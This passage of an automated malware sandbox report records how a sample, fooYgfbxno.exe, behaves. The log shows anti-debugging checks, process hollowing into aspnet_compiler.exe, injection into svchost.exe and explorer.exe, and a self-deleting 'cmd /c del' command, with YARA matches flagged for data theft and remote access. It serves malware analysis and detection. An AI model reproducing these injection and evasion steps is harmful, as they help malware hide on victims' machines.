Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154D294 mov eax, dword ptr fs:[00000030h] 2_2_0154D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154D294 mov eax, dword ptr fs:[00000030h] 2_2_0154D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0152AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0152AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0154FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h] 2_2_015152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h] 2_2_015152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h] 2_2_015152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h] 2_2_015152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h] 2_2_015152A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01537D50 mov eax, dword ptr fs:[00000030h] 2_2_01537D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01553D43 mov eax, dword ptr fs:[00000030h] 2_2_01553D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01593540 mov eax, dword ptr fs:[00000030h] 2_2_01593540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C3D40 mov eax, dword ptr fs:[00000030h] 2_2_015C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153C577 mov eax, dword ptr fs:[00000030h] 2_2_0153C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153C577 mov eax, dword ptr fs:[00000030h] 2_2_0153C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151AD30 mov eax, dword ptr fs:[00000030h] 2_2_0151AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DE539 mov eax, dword ptr fs:[00000030h] 2_2_015DE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h] 2_2_01523D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8D34 mov eax, dword ptr fs:[00000030h] 2_2_015E8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0159A537 mov eax, dword ptr fs:[00000030h] 2_2_0159A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h] 2_2_01544D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h] 2_2_01544D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h] 2_2_01544D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h] 2_2_0154F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h] 2_2_0154F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h] 2_2_0154F527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h] 2_2_01596DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C8DF1 mov eax, dword ptr fs:[00000030h] 2_2_015C8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0152D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0152D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h] 2_2_015DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h] 2_2_015DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h] 2_2_015DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h] 2_2_015DFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154FD9B mov eax, dword ptr fs:[00000030h] 2_2_0154FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154FD9B mov eax, dword ptr fs:[00000030h] 2_2_0154FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542581 mov eax, dword ptr fs:[00000030h] 2_2_01542581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542581 mov eax, dword ptr fs:[00000030h] 2_2_01542581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542581 mov eax, dword ptr fs:[00000030h] 2_2_01542581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542581 mov eax, dword ptr fs:[00000030h] 2_2_01542581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h] 2_2_01512D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h] 2_2_01512D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h] 2_2_01512D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h] 2_2_01512D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h] 2_2_01512D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h] 2_2_015D2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h] 2_2_01541DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h] 2_2_01541DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h] 2_2_01541DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E05AC mov eax, dword ptr fs:[00000030h] 2_2_015E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E05AC mov eax, dword ptr fs:[00000030h] 2_2_015E05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015435A1 mov eax, dword ptr fs:[00000030h] 2_2_015435A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AC450 mov eax, dword ptr fs:[00000030h] 2_2_015AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AC450 mov eax, dword ptr fs:[00000030h] 2_2_015AC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A44B mov eax, dword ptr fs:[00000030h] 2_2_0154A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h] 2_2_0153B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: CB0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DB2008
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\fooYgfbxno.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3968
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: explorer.exe, 00000003.00000000.271766128.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333612659.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.286969510.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000003.00000000.277137044.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.303144271.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333647226.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.287002544.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\user\Desktop\fooYgfbxno.exe Queries volume information: C:\Users\user\Desktop\fooYgfbxno.exe VolumeInformation
Source: C:\Users\user\Desktop\fooYgfbxno.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\fooYgfbxno.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY